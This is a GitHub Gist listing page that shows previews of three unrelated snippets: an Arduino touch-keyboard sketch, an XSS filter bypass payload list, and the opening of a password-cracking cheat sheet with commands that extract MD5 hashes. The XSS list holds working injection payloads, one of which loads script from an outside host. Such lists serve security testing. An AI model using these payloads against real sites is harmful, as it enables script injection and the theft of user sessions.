Skip to content

Instantly share code, notes, and snippets.

@Wieku
Wieku / arduino.c
Created February 17, 2016 23:14
osu! touch keyboard
#include <CapacitiveSensor.h>
CapacitiveSensor sens1 = CapacitiveSensor(8,6);
CapacitiveSensor sens2 = CapacitiveSensor(4,2);
void setup() {
sens1.set_CS_AutocaL_Millis(0xFFFFFFFF);
sens2.set_CS_AutocaL_Millis(0xFFFFFFFF);
Serial.begin(115200);
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 21, 2024 10:27
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@crunchprank
crunchprank / pass-crack-cheat-sheet.md
Created December 15, 2015 22:13
Cheat Sheet For Password Crackers

Cheat Sheet For Password Crackers

This list was posted over at Unix-Ninja. I take no credit for these. Posting these here for my own convenience.

Extracting Data

Extract md5 hashes

# egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
# egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt